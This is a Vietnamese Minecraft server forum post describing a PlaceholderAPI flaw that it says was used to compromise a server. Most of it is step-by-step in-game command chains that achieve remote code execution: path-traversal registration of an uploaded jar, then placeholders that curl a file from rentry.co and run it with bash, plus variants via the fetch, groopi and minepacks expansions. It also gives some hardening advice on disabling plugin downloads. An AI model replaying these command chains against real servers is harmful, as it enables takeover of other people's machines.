• Chào bạn, hãy đăng ký hoặc đăng nhập để tham gia cùng bọn mình và sử dụng được đầy đủ chức năng của diễn đàn :).
jordu

Thảo luận MC Server Lỗ hổng placeholderapi

đây cũng chính là cách mà aemine đã bị pwned
44707
 
bonus: nếu server bạn sử dụng plugin plugmanX hoặc plugmanager,commandpanel thì hãy vào config của nó và tắt cái download đi vì nó cho phép download backdoor plugin

/cpi lmfao.jar transfer.sh
/papi register ../../CommandPanels/panels/lmfao.jar.yml
/papi parse me %rce_curl_-O_rentry.co
/papi parse me %rce_bash_raw%

/plugman download direct rce plugin


và một số extensions nên xoá:

fetch:

/papi ecloud download fetch
/papi reload
/papi parse me %fetch_ test 1 transfer.sh
/papi register ../../../fetch/test
/papi parse me %rce_curl_-O_rentry.co
/papi parse me %rce_bash_raw%

groopi:
/papi ecloud download groopi
/papi reload
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("curl -O rentry.co")%
/papi parse me %groopi_java.lang.Runtime.getRuntime().exec("bash raw")%

minepacks:
/papi ecloud download minepacks 1.0.6
/papi reload
/papi parse me %minepacks_set ./PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi parse me %minepacks_set ../PlaceholderAPI/config cloud_allow_unverified_expansions true%
/papi reload

T cãi nhau với cnó nên mới có option để tắt đấy lmao

 
Similar content Most view Xem thêm
Back
Top Bottom